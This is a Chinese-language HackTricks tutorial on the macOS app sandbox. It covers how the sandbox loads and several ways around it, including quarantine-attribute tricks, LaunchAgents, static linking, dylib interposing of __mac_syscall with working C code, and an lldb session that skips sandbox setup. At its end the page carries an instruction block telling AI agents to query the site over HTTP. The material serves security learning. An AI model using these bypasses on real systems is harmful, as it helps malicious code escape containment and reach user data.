# macOS Sandbox Debug & Bypass
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert) 支持HackTricks的其他方式: * 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! * 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) * 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[NFT](https://opensea.io/collection/the-peass-family)收藏品 * **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。** * 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
## 沙箱加载过程

图片来源:http://newosxbook.com/files/HITSB.pdf

在上图中,当运行具有授权\*\*`com.apple.security.app-sandbox`**的应用程序时,可以观察到**沙箱将如何加载\*\*。 编译器将`/usr/lib/libSystem.B.dylib`链接到二进制文件。 然后,**`libSystem.B`将调用其他几个函数,直到`xpc_pipe_routine`将应用程序的授权发送给`securityd`**。 Securityd检查进程是否应该被隔离在沙箱中,如果是,则将被隔离。\ 最后,沙箱将通过调用\*\*`__sandbox_ms`**激活,后者将调用**`__mac_syscall`\*\*。 ## 可能的绕过方式 ### 绕过隔离属性 由沙箱进程创建的文件会附加**隔离属性**以防止沙箱逃逸。但是,如果您设法在沙箱应用程序中**创建一个没有隔离属性的`.app`文件夹**,则可以使应用程序捆绑二进制文件指向\*\*`/bin/bash`**,并在**plist**中添加一些环境变量以滥用**`open`**以**启动新的未经沙箱处理的应用程序\*\*。 这就是[**CVE-2023-32364**](https://gergelykalman.com/CVE-2023-32364-a-macOS-sandbox-escape-by-mounting.html)中所做的事情\*\*。\*\* {% hint style="danger" %} 因此,目前,如果您只能创建一个名称以\*\*`.app`**结尾的文件夹而没有隔离属性,您可以逃离沙箱,因为macOS仅在**`.app`文件夹**和**主可执行文件**中**检查\*\* **隔离**属性(我们将主可执行文件指向\*\*`/bin/bash`\*\*)。 请注意,如果已经授权运行.app捆绑包(具有授权运行标志的隔离xttr),您也可以滥用它... 除非现在您无法在\*\*`.app`\*\*捆绑包中写入,除非您具有某些特权的TCC权限(在高沙箱中您将没有)。 {% endhint %} ### 滥用Open功能 在[**Word沙箱绕过的最后示例**](https://hacktricks.xsx.tw/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/pages/Oe6rrPxrpQeFuU5X7Z9n#word-sandbox-bypass-via-login-items-and-.zshenv)中,可以看到如何滥用\*\*`open`\*\*命令行功能来绕过沙箱。 {% content-ref url="/pages/Oe6rrPxrpQeFuU5X7Z9n" %} [macOS Office Sandbox Bypasses](/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/macos-office-sandbox-bypasses.md) {% endcontent-ref %} ### 启动代理/守护程序 即使应用程序**应该被沙箱化**(`com.apple.security.app-sandbox`),如果它是从LaunchAgent(`~/Library/LaunchAgents`)中执行的,仍然可以绕过沙箱。\ 如[**此文章**](https://www.vicarius.io/vsociety/posts/cve-2023-26818-sandbox-macos-tcc-bypass-w-telegram-using-dylib-injection-part-2-3?q=CVE-2023-26818)中所述,如果要使一个被沙箱化的应用程序获得持久性,可以将其自动执行为LaunchAgent,并可能通过DyLib环境变量注入恶意代码。 ### 滥用自动启动位置 如果沙箱进程可以在**稍后将要运行二进制文件的未经沙箱处理的应用程序的位置写入**,它将能够**通过将二进制文件放置在那里**来逃逸。这种位置的一个很好的例子是`~/Library/LaunchAgents`或`/System/Library/LaunchDaemons`。 为此,您甚至可能需要**2个步骤**:使具有**更宽松沙箱**(`file-read*`,`file-write*`)的进程执行您的代码,实际上会在将要**未经沙箱处理执行的位置写入**。 查看有关**自动启动位置**的页面: {% content-ref url="/pages/5q1NlsgKHUQqN42lRQ8S" %} [macOS Auto Start](/macos-hardening/macos-auto-start-locations.md) {% endcontent-ref %} ### 滥用其他进程 如果从沙箱进程中能够**危害运行在较不受限制的沙箱中(或没有沙箱)的其他进程**,则可以逃离其沙箱: {% content-ref url="/pages/z3IEUvrso9iNlcIUmwiI" %} [macOS Process Abuse](/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse.md) {% endcontent-ref %} ### 静态编译和动态链接 [**这项研究**](https://saagarjha.com/blog/2020/05/20/mac-app-store-sandbox-escape/)发现了绕过沙箱的两种方法。因为沙箱是从用户空间应用时加载**libSystem**库的。如果一个二进制文件可以避免加载它,它将永远不会被沙箱化: * 如果二进制文件是**完全静态编译**的,它可以避免加载该库。 * 如果**二进制文件不需要加载任何库**(因为链接器也在libSystem中),它将不需要加载libSystem。 ### Shellcodes 请注意,即使ARM64中的**shellcodes**也需要链接到`libSystem.dylib`: ```bash ld -o shell shell.o -macosx_version_min 13.0 ld: dynamic executables or dylibs must link with libSystem.dylib for architecture arm64 ``` ### 权限 请注意,即使某些**操作**可能在沙盒中被**允许**,如果应用程序具有特定的**权限**,就像这样: ```scheme (when (entitlement "com.apple.security.network.client") (allow network-outbound (remote ip)) (allow mach-lookup (global-name "com.apple.airportd") (global-name "com.apple.cfnetwork.AuthBrokerAgent") (global-name "com.apple.cfnetwork.cfnetworkagent") [...] ``` ### Interposting Bypass 有关**Interposting**的更多信息,请查看: {% content-ref url="/pages/u4V22DqKFMZhIPxjYwfP" %} [macOS Function Hooking](/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-function-hooking.md) {% endcontent-ref %} #### Interpost `_libsecinit_initializer` 以防止沙盒 ```c // gcc -dynamiclib interpose.c -o interpose.dylib #include void _libsecinit_initializer(void); void overriden__libsecinit_initializer(void) { printf("_libsecinit_initializer called\n"); } __attribute__((used, section("__DATA,__interpose"))) static struct { void (*overriden__libsecinit_initializer)(void); void (*_libsecinit_initializer)(void); } _libsecinit_initializer_interpose = {overriden__libsecinit_initializer, _libsecinit_initializer}; ``` ```bash DYLD_INSERT_LIBRARIES=./interpose.dylib ./sand _libsecinit_initializer called Sandbox Bypassed! ``` #### 拦截 `__mac_syscall` 以防止沙盒 {% code title="interpose.c" %} ```c // gcc -dynamiclib interpose.c -o interpose.dylib #include #include // Forward Declaration int __mac_syscall(const char *_policyname, int _call, void *_arg); // Replacement function int my_mac_syscall(const char *_policyname, int _call, void *_arg) { printf("__mac_syscall invoked. Policy: %s, Call: %d\n", _policyname, _call); if (strcmp(_policyname, "Sandbox") == 0 && _call == 0) { printf("Bypassing Sandbox initiation.\n"); return 0; // pretend we did the job without actually calling __mac_syscall } // Call the original function for other cases return __mac_syscall(_policyname, _call, _arg); } // Interpose Definition struct interpose_sym { const void *replacement; const void *original; }; // Interpose __mac_syscall with my_mac_syscall __attribute__((used)) static const struct interpose_sym interposers[] __attribute__((section("__DATA, __interpose"))) = { { (const void *)my_mac_syscall, (const void *)__mac_syscall }, }; ``` {% endcode %} ```bash DYLD_INSERT_LIBRARIES=./interpose.dylib ./sand __mac_syscall invoked. Policy: Sandbox, Call: 2 __mac_syscall invoked. Policy: Sandbox, Call: 2 __mac_syscall invoked. Policy: Sandbox, Call: 0 Bypassing Sandbox initiation. __mac_syscall invoked. Policy: Quarantine, Call: 87 __mac_syscall invoked. Policy: Sandbox, Call: 4 Sandbox Bypassed! ``` ### 使用 lldb 调试和绕过沙盒 让我们编译一个应该被沙盒化的应用程序: ```c #include int main() { system("cat ~/Desktop/del.txt"); } ``` 在macOS中,沙盒是一种安全机制,用于限制应用程序的权限以保护系统和用户数据。然而,沙盒本身可能存在漏洞,允许攻击者绕过沙盒并执行恶意操作。为了发现和利用这些漏洞,可以使用调试技术和特权升级技术。 ```xml com.apple.security.app-sandbox ``` 在macOS中,Info.plist文件包含了应用程序的配置信息,其中也包括了沙盒的配置。通过修改应用程序的Info.plist文件,可以调整沙盒的权限和行为。 ```xml CFBundleIdentifier xyz.hacktricks.sandbox CFBundleName Sandbox ``` 然后编译该应用程序: {% code overflow="wrap" %} ```bash # Compile it gcc -Xlinker -sectcreate -Xlinker __TEXT -Xlinker __info_plist -Xlinker Info.plist sand.c -o sand # Create a certificate for "Code Signing" # Apply the entitlements via signing codesign -s --entitlements entitlements.xml sand ``` {% endcode %} {% hint style="danger" %} 该应用程序将尝试**读取**文件\*\*`~/Desktop/del.txt`**,而**沙盒不允许\*\*。\ 在那里创建一个文件,一旦绕过沙盒,它就能读取它: ```bash echo "Sandbox Bypassed" > ~/Desktop/del.txt ``` {% endhint %} 让我们调试应用程序,查看沙盒何时加载: ```bash # Load app in debugging lldb ./sand # Set breakpoint in xpc_pipe_routine (lldb) b xpc_pipe_routine # run (lldb) r # This breakpoint is reached by different functionalities # Check in the backtrace is it was de sandbox one the one that reached it # We are looking for the one libsecinit from libSystem.B, like the following one: (lldb) bt * thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1 * frame #0: 0x00000001873d4178 libxpc.dylib`xpc_pipe_routine frame #1: 0x000000019300cf80 libsystem_secinit.dylib`_libsecinit_appsandbox + 584 frame #2: 0x00000001874199c4 libsystem_trace.dylib`_os_activity_initiate_impl + 64 frame #3: 0x000000019300cce4 libsystem_secinit.dylib`_libsecinit_initializer + 80 frame #4: 0x0000000193023694 libSystem.B.dylib`libSystem_initializer + 272 # To avoid lldb cutting info (lldb) settings set target.max-string-summary-length 10000 # The message is in the 2 arg of the xpc_pipe_routine function, get it with: (lldb) p (char *) xpc_copy_description($x1) (char *) $0 = 0x000000010100a400 " { count = 5, transaction: 0, voucher = 0x0, contents =\n\t\"SECINITD_REGISTRATION_MESSAGE_SHORT_NAME_KEY\" => { length = 4, contents = \"sand\" }\n\t\"SECINITD_REGISTRATION_MESSAGE_IMAGE_PATHS_ARRAY_KEY\" => { count = 42, capacity = 64, contents =\n\t\t0: { length = 14, contents = \"/tmp/lala/sand\" }\n\t\t1: { length = 22, contents = \"/private/tmp/lala/sand\" }\n\t\t2: { length = 26, contents = \"/usr/lib/libSystem.B.dylib\" }\n\t\t3: { length = 30, contents = \"/usr/lib/system/libcache.dylib\" }\n\t\t4: { length = 37, contents = \"/usr/lib/system/libcommonCrypto.dylib\" }\n\t\t5: { length = 36, contents = \"/usr/lib/system/libcompiler_rt.dylib\" }\n\t\t6: { length = 33, contents = \"/usr/lib/system/libcopyfile.dylib\" }\n\t\t7: { length = 35, contents = \"/usr/lib/system/libcorecry"... # The 3 arg is the address were the XPC response will be stored (lldb) register read x2 x2 = 0x000000016fdfd660 # Move until the end of the function (lldb) finish # Read the response ## Check the address of the sandbox container in SECINITD_REPLY_MESSAGE_CONTAINER_ROOT_PATH_KEY (lldb) memory read -f p 0x000000016fdfd660 -c 1 0x16fdfd660: 0x0000600003d04000 (lldb) p (char *) xpc_copy_description(0x0000600003d04000) (char *) $4 = 0x0000000100204280 " { count = 7, transaction: 0, voucher = 0x0, contents =\n\t\"SECINITD_REPLY_MESSAGE_CONTAINER_ID_KEY\" => { length = 22, contents = \"xyz.hacktricks.sandbox\" }\n\t\"SECINITD_REPLY_MESSAGE_QTN_PROC_FLAGS_KEY\" => : 2\n\t\"SECINITD_REPLY_MESSAGE_CONTAINER_ROOT_PATH_KEY\" => { length = 65, contents = \"/Users/carlospolop/Library/Containers/xyz.hacktricks.sandbox/Data\" }\n\t\"SECINITD_REPLY_MESSAGE_SANDBOX_PROFILE_DATA_KEY\" => : { length = 19027 bytes, contents = 0x0000f000ba0100000000070000001e00350167034d03c203... }\n\t\"SECINITD_REPLY_MESSAGE_VERSION_NUMBER_KEY\" => : 1\n\t\"SECINITD_MESSAGE_TYPE_KEY\" => : 2\n\t\"SECINITD_REPLY_FAILURE_CODE\" => : 0\n}" # To bypass the sandbox we need to skip the call to __mac_syscall # Lets put a breakpoint in __mac_syscall when x1 is 0 (this is the code to enable the sandbox) (lldb) breakpoint set --name __mac_syscall --condition '($x1 == 0)' (lldb) c # The 1 arg is the name of the policy, in this case "Sandbox" (lldb) memory read -f s $x0 0x19300eb22: "Sandbox" # # BYPASS # # Due to the previous bp, the process will be stopped in: Process 2517 stopped * thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1 frame #0: 0x0000000187659900 libsystem_kernel.dylib`__mac_syscall libsystem_kernel.dylib`: -> 0x187659900 <+0>: mov x16, #0x17d 0x187659904 <+4>: svc #0x80 0x187659908 <+8>: b.lo 0x187659928 ; <+40> 0x18765990c <+12>: pacibsp # To bypass jump to the b.lo address modifying some registers first (lldb) breakpoint delete 1 # Remove bp (lldb) register write $pc 0x187659928 #b.lo address (lldb) register write $x0 0x00 (lldb) register write $x1 0x00 (lldb) register write $x16 0x17d (lldb) c Process 2517 resuming Sandbox Bypassed! Process 2517 exited with status = 0 (0x00000000) ``` {% hint style="warning" %} **即使绕过了沙箱,TCC** 也会询问用户是否允许该进程读取桌面上的文件 {% endhint %} ## 参考资料 * * *
从零开始学习AWS黑客技术,成为专家 htARTE (HackTricks AWS Red Team Expert)! 支持HackTricks的其他方式: * 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! * 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) * 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) * **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://hacktricks.xsx.tw/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.